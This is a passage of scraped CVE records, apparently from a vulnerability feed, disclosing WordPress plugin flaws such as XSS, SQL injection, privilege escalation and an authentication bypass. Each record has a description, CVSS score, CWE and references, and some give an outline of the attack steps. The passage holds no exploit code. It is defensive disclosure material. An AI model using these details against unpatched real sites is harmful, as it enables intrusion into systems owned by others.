"value": "The Schedule Post Changes With PublishPress Future plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u0027wrapper\u0027 attribute of the [futureaction] shortcode in all versions up to, and including, 4.10.0. This is due to insufficient input sanitization on the wrapper attribute. The plugin uses esc_html() to escape the value, but esc_html() only encodes HTML entities and does not prevent attribute injection when the value is used as an HTML tag name in a sprintf() call. An attacker can inject event handler attributes via spaces in the wrapper value. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Since it is also possible for administrators to make this functionality available to lower-privileged users, this introduces the possibility of abuse by contributors."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T02:26:56.378Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9acf80aa-8354-4430-9836-18fa17854521?source=cve"
},
{
"url": "https://plugins.trac.wordpress.org/browser/post-expirator/trunk/src/Modules/Expirator/Controllers/ShortcodeController.php#L173"
},
{
"url": "https://plugins.trac.wordpress.org/browser/post-expirator/tags/4.9.4/src/Modules/Expirator/Controllers/ShortcodeController.php#L173"
},
{
"url": "https://github.com/publishpress/publishpress-future/releases"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-03-31T15:33:05.000Z",
"value": "Vendor Notified"
},
{
"lang": "en",
"time": "2026-05-04T14:02:32.000Z",
"value": "Disclosed"
}
],
"title": "Schedule Post Changes With PublishPress Future: Unpublish, Delete, Change Status, Trash, Change Categories \u003c= 4.10.0 - Authenticated (Administrator+) Stored Cross-Site Scripting via \u0027wrapper\u0027 Shortcode Attribute"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-5247",
"datePublished": "2026-05-05T02:26:56.378Z",
"dateReserved": "2026-03-31T15:17:50.677Z",
"dateUpdated": "2026-05-05T02:26:56.378Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-4409 (GCVE-0-2026-4409)
Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
VLAI?
Title
Subscribe To Comments Reloaded <= 240119 - Improper Authorization to Unauthenticated Arbitrary Subscription Management
Summary
The Subscribe To Comments Reloaded plugin for WordPress is vulnerable to unauthorized modification of data due to a leaked secret key and usage of a weak hash generation algorithm in all versions up to, and including, 240119. This makes it possible for unauthenticated attackers to extract the global key from any public post page, forge authorization keys and manage comment subscription preferences for arbitrary users
Severity ?
6.5 (Medium)
CWE
- CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| wpkube | Subscribe To Comments Reloaded |
Affected:
0 , ≤ 240119
(semver)
|
Credits
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Subscribe To Comments Reloaded",
"vendor": "wpkube",
"versions": [
{
"lessThanOrEqual": "240119",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Supakiad S."
}
],
"descriptions": [
{
"lang": "en",
"value": "The Subscribe To Comments Reloaded plugin for WordPress is vulnerable to unauthorized modification of data due to a leaked secret key and usage of a weak hash generation algorithm in all versions up to, and including, 240119. This makes it possible for unauthenticated attackers to extract the global key from any public post page, forge authorization keys and manage comment subscription preferences for arbitrary users"
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-200",
"description": "CWE-200 Exposure of Sensitive Information to an Unauthorized Actor",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T02:26:55.996Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/91f9235e-f578-475f-92c3-34062d6d1e3d?source=cve"
},
{
"url": "https://plugins.trac.wordpress.org/browser/subscribe-to-comments-reloaded/tags/240119/wp_subscribe_reloaded.php#L1613"
},
{
"url": "https://plugins.trac.wordpress.org/browser/subscribe-to-comments-reloaded/tags/240119/utils/stcr_utils.php#L164"
},
{
"url": "https://plugins.trac.wordpress.org/browser/subscribe-to-comments-reloaded/tags/240119/templates/user.php#L37"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-02-24T00:00:00.000Z",
"value": "Discovered"
},
{
"lang": "en",
"time": "2026-05-04T14:11:52.000Z",
"value": "Disclosed"
}
],
"title": "Subscribe To Comments Reloaded \u003c= 240119 - Improper Authorization to Unauthenticated Arbitrary Subscription Management"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-4409",
"datePublished": "2026-05-05T02:26:55.996Z",
"dateReserved": "2026-03-18T23:02:48.429Z",
"dateUpdated": "2026-05-05T02:26:55.996Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-5100 (GCVE-0-2026-5100)
Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
VLAI?
Title
AWP Classifieds <= 4.4.5 - Unauthenticated SQL Injection via 'regions'
Summary
The AWP Classifieds plugin for WordPress is vulnerable to SQL Injection via the 'regions' parameter array keys in versions up to, and including, 4.4.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
Severity ?
7.5 (High)
CWE
- CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Assigner
References
| URL | Tags | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| strategy11team | AWP Classifieds |
Affected:
0 , ≤ 4.4.5
(semver)
|
Credits
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "AWP Classifieds",
"vendor": "strategy11team",
"versions": [
{
"lessThanOrEqual": "4.4.5",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Hunter Jensen"
}
],
"descriptions": [
{
"lang": "en",
"value": "The AWP Classifieds plugin for WordPress is vulnerable to SQL Injection via the \u0027regions\u0027 parameter array keys in versions up to, and including, 4.4.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-89",
"description": "CWE-89 Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T02:26:55.631Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7908d167-f831-4ed0-b754-2b390b5c3b2c?source=cve"
},
{
"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/functions.php#L1240"
},
{
"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/functions.php#L1258"
},
{
"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/functions.php#L1269"
},
{
"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/functions.php#L1276"
},
{
"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/frontend/page-search-ads.php#L63"
},
{
"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/frontend/page-search-ads.php#L70"
},
{
"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/frontend/page-search-ads.php#L168"
},
{
"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/frontend/page-search-ads.php#L174"
},
{
"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/class-awpcp.php#L339"
},
{
"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/class-awpcp.php#L342"
},
{
"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L795"
},
{
"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L804"
},
{
"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L881"
},
{
"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L887"
},
{
"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L890"
},
{
"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L895"
},
{
"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L902"
},
{
"url": "https://plugins.trac.wordpress.org/browser/another-wordpress-classifieds-plugin/tags/4.4.4/includes/listings/class-query-integration.php#L903"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-05-04T14:11:27.000Z",
"value": "Disclosed"
}
],
"title": "AWP Classifieds \u003c= 4.4.5 - Unauthenticated SQL Injection via \u0027regions\u0027"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-5100",
"datePublished": "2026-05-05T02:26:55.631Z",
"dateReserved": "2026-03-29T14:10:38.249Z",
"dateUpdated": "2026-05-05T02:26:55.631Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-13618 (GCVE-0-2025-13618)
Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
VLAI?
Title
Mentoring <= 1.2.8 - Unauthenticated Privilege Escalation in mentoring_process_registration
Summary
The Mentoring plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.2.8. This is due to the plugin not properly restricting the roles that users can register with in the mentoring_process_registration() function. This makes it possible for unauthenticated attackers to register with administrator-level user accounts.
Severity ?
9.8 (Critical)
CWE
- CWE-269 - Improper Privilege Management
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| dreamstechnologies | Mentoring |
Affected:
0 , ≤ 1.2.8
(semver)
|
Credits
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Mentoring",
"vendor": "dreamstechnologies",
"versions": [
{
"lessThanOrEqual": "1.2.8",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Ismail Syaleh"
}
],
"descriptions": [
{
"lang": "en",
"value": "The Mentoring plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.2.8. This is due to the plugin not properly restricting the roles that users can register with in the mentoring_process_registration() function. This makes it possible for unauthenticated attackers to register with administrator-level user accounts."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-269",
"description": "CWE-269 Improper Privilege Management",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T02:26:55.265Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7192fb4c-0434-4e11-a2a7-c205b8d6b68e?source=cve"
},
{
"url": "https://themeforest.net/item/mentoring-education-wordpress-theme/36457081"
},
{
"url": "https://mentoring-wp.dreamsmarketplace.com/documentation/changelog.html"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-05-04T13:32:59.000Z",
"value": "Disclosed"
}
],
"title": "Mentoring \u003c= 1.2.8 - Unauthenticated Privilege Escalation in mentoring_process_registration"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2025-13618",
"datePublished": "2026-05-05T02:26:55.265Z",
"dateReserved": "2025-11-24T19:59:15.187Z",
"dateUpdated": "2026-05-05T02:26:55.265Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-6696 (GCVE-0-2026-6696)
Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
VLAI?
Title
Zingaya Click-to-Call <= 1.0 - Reflected Cross-Site Scripting via 'email' Parameter
Summary
The Zingaya Click-to-Call plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'email', 'first_name', 'last_name', and 'phone' parameters on the plugin's sign-up admin page in all versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
Severity ?
6.1 (Medium)
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| zingaya | Zingaya Click-to-Call |
Affected:
0 , ≤ 1.0
(semver)
|
Credits
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Zingaya Click-to-Call",
"vendor": "zingaya",
"versions": [
{
"lessThanOrEqual": "1.0",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Julian Chibuike Nwadinobi"
}
],
"descriptions": [
{
"lang": "en",
"value": "The Zingaya Click-to-Call plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u0027email\u0027, \u0027first_name\u0027, \u0027last_name\u0027, and \u0027phone\u0027 parameters on the plugin\u0027s sign-up admin page in all versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T02:26:54.906Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5bdd515c-6b52-467c-9446-6ae9b3b75e50?source=cve"
},
{
"url": "https://wordpress.org/plugins/zingaya-click-to-call/"
},
{
"url": "https://plugins.trac.wordpress.org/browser/zingaya-click-to-call/tags/1.0/zingaya-admin.php#L62"
},
{
"url": "https://plugins.trac.wordpress.org/browser/zingaya-click-to-call/tags/1.0/zingaya-admin.php#L71"
},
{
"url": "https://plugins.trac.wordpress.org/browser/zingaya-click-to-call/tags/1.0/zingaya-admin.php#L79"
},
{
"url": "https://plugins.trac.wordpress.org/browser/zingaya-click-to-call/tags/1.0/zingaya-admin.php#L104"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-05-04T14:07:29.000Z",
"value": "Disclosed"
}
],
"title": "Zingaya Click-to-Call \u003c= 1.0 - Reflected Cross-Site Scripting via \u0027email\u0027 Parameter"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-6696",
"datePublished": "2026-05-05T02:26:54.906Z",
"dateReserved": "2026-04-20T16:58:47.464Z",
"dateUpdated": "2026-05-05T02:26:54.906Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-4730 (GCVE-0-2026-4730)
Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
VLAI?
Title
Charts Ninja: Create Beautiful Graphs & Charts and Easily Add Them to Your Website <= 2.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'chartid' Shortcode Attribute
Summary
The Charts Ninja: Create Beautiful Graphs & Charts and Easily Add Them to Your Website plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'chartid' shortcode attribute in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Severity ?
6.4 (Medium)
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| commonninja | Charts Ninja: Create Beautiful Graphs & Charts and Easily Add Them to Your Website |
Affected:
0 , ≤ 2.1.0
(semver)
|
Credits
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Charts Ninja: Create Beautiful Graphs \u0026 Charts and Easily Add Them to Your Website",
"vendor": "commonninja",
"versions": [
{
"lessThanOrEqual": "2.1.0",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Djaidja Moundjid"
}
],
"descriptions": [
{
"lang": "en",
"value": "The Charts Ninja: Create Beautiful Graphs \u0026 Charts and Easily Add Them to Your Website plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u0027chartid\u0027 shortcode attribute in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T02:26:54.536Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/491c7680-d270-41ed-a756-9397a0bd86bc?source=cve"
},
{
"url": "https://wordpress.org/plugins/charts-ninja-graphs-and-charts"
},
{
"url": "https://plugins.trac.wordpress.org/browser/charts-ninja-graphs-and-charts/tags/2.1.0/chartsninja.php#L24"
},
{
"url": "https://plugins.trac.wordpress.org/browser/charts-ninja-graphs-and-charts/trunk/chartsninja.php#L24"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-05-04T14:07:54.000Z",
"value": "Disclosed"
}
],
"title": "Charts Ninja: Create Beautiful Graphs \u0026 Charts and Easily Add Them to Your Website \u003c= 2.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via \u0027chartid\u0027 Shortcode Attribute"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-4730",
"datePublished": "2026-05-05T02:26:54.536Z",
"dateReserved": "2026-03-23T23:26:58.201Z",
"dateUpdated": "2026-05-05T02:26:54.536Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-6701 (GCVE-0-2026-6701)
Vulnerability from cvelistv5 – Published: 2026-05-05 02:26 – Updated: 2026-05-05 02:26
VLAI?
Title
addfreespace <= 0.1.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting via Settings Page
Summary
The addfreespace plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.1.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
Severity ?
4.3 (Medium)
CWE
- CWE-352 - Cross-Site Request Forgery (CSRF)
Assigner
References
| URL | Tags | ||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| kazunii | addfreespace |
Affected:
0 , ≤ 0.1.3
(semver)
|
Credits
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "addfreespace",
"vendor": "kazunii",
"versions": [
{
"lessThanOrEqual": "0.1.3",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Muhammad Nur Ibnu Hubab"
}
],
"descriptions": [
{
"lang": "en",
"value": "The addfreespace plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.1.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-352",
"description": "CWE-352 Cross-Site Request Forgery (CSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T02:26:54.012Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/40eaeb28-c721-4977-951d-582b7dc2bd12?source=cve"
},
{
"url": "https://plugins.trac.wordpress.org/browser/addfreespace/trunk/addfreespace.php#L45"
},
{
"url": "https://plugins.trac.wordpress.org/browser/addfreespace/tags/0.1.3/addfreespace.php#L45"
},
{
"url": "https://plugins.trac.wordpress.org/browser/addfreespace/trunk/addfreespace_functions.php#L30"
},
{
"url": "https://plugins.trac.wordpress.org/browser/addfreespace/tags/0.1.3/addfreespace_functions.php#L30"
},
{
"url": "https://plugins.trac.wordpress.org/browser/addfreespace/trunk/addfreespace_functions.php#L59"
},
{
"url": "https://plugins.trac.wordpress.org/browser/addfreespace/tags/0.1.3/addfreespace_functions.php#L59"
},
{
"url": "https://plugins.trac.wordpress.org/browser/addfreespace/trunk/addfreespace.php#L312"
},
{
"url": "https://plugins.trac.wordpress.org/browser/addfreespace/tags/0.1.3/addfreespace.php#L312"
},
{
"url": "https://plugins.trac.wordpress.org/browser/addfreespace/trunk/addfreespace_functions.php#L83"
},
{
"url": "https://plugins.trac.wordpress.org/browser/addfreespace/tags/0.1.3/addfreespace_functions.php#L83"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-05-04T14:07:04.000Z",
"value": "Disclosed"
}
],
"title": "addfreespace \u003c= 0.1.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting via Settings Page"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-6701",
"datePublished": "2026-05-05T02:26:54.012Z",
"dateReserved": "2026-04-20T17:28:17.779Z",
"dateUpdated": "2026-05-05T02:26:54.012Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-5722 (GCVE-0-2026-5722)
Vulnerability from cvelistv5 – Published: 2026-05-05 01:24 – Updated: 2026-05-05 01:24
VLAI?
Title
MoreConvert Pro <= 1.9.14 - Authentication Bypass via Waitlist Guest Verification Token Reuse
Summary
The MoreConvert Pro plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.9.14. This is due to the guest waitlist verification flow not invalidating or regenerating verification tokens when the customer email address is changed. This makes it possible for unauthenticated attackers to authenticate as existing users, including administrators, by obtaining a valid guest verification token for an attacker-controlled email, changing the same guest customer email to the target account email through the public waitlist flow, and then using the original verification link.
Severity ?
9.8 (Critical)
CWE
- CWE-287 - Improper Authentication
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| MoreConvert | MoreConvert Pro |
Affected:
0 , ≤ 1.9.14
(semver)
|
Credits
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "MoreConvert Pro",
"vendor": "MoreConvert",
"versions": [
{
"lessThanOrEqual": "1.9.14",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Nguyen Ngoc Duc"
}
],
"descriptions": [
{
"lang": "en",
"value": "The MoreConvert Pro plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.9.14. This is due to the guest waitlist verification flow not invalidating or regenerating verification tokens when the customer email address is changed. This makes it possible for unauthenticated attackers to authenticate as existing users, including administrators, by obtaining a valid guest verification token for an attacker-controlled email, changing the same guest customer email to the target account email through the public waitlist flow, and then using the original verification link."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-287",
"description": "CWE-287 Improper Authentication",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-05T01:24:36.485Z",
"orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"shortName": "Wordfence"
},
"references": [
{
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fe887475-f7e8-4fda-a793-bc6f37b70f3e?source=cve"
},
{
"url": "https://wordpress.org/plugins/smart-wishlist-for-more-convert/"
},
{
"url": "https://moreconvert.com/changelog/"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-04-23T12:13:10.000Z",
"value": "Vendor Notified"
},
{
"lang": "en",
"time": "2026-05-04T13:18:12.000Z",
"value": "Disclosed"
}
],
"title": "MoreConvert Pro \u003c= 1.9.14 - Authentication Bypass via Waitlist Guest Verification Token Reuse"
}
},
"cveMetadata": {
"assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
"assignerShortName": "Wordfence",
"cveId": "CVE-2026-5722",
"datePublished": "2026-05-05T01:24:36.485Z",
"dateReserved": "2026-04-06T20:32:04.084Z",
"dateUpdated": "2026-05-05T01:24:36.485Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-5063 (GCVE-0-2026-5063)
Vulnerability from cvelistv5 – Published: 2026-05-03 04:25 – Updated: 2026-05-04 17:51
VLAI?
Title
NEX-Forms <= 9.1.11 - Unauthenticated Stored Cross-Site Scripting via POST Parameter Key Names
Summary
The NEX-Forms – Ultimate Forms Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via POST parameter key names in the submit_nex_form() function in versions up to, and including, 9.1.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Severity ?
7.2 (High)
CWE
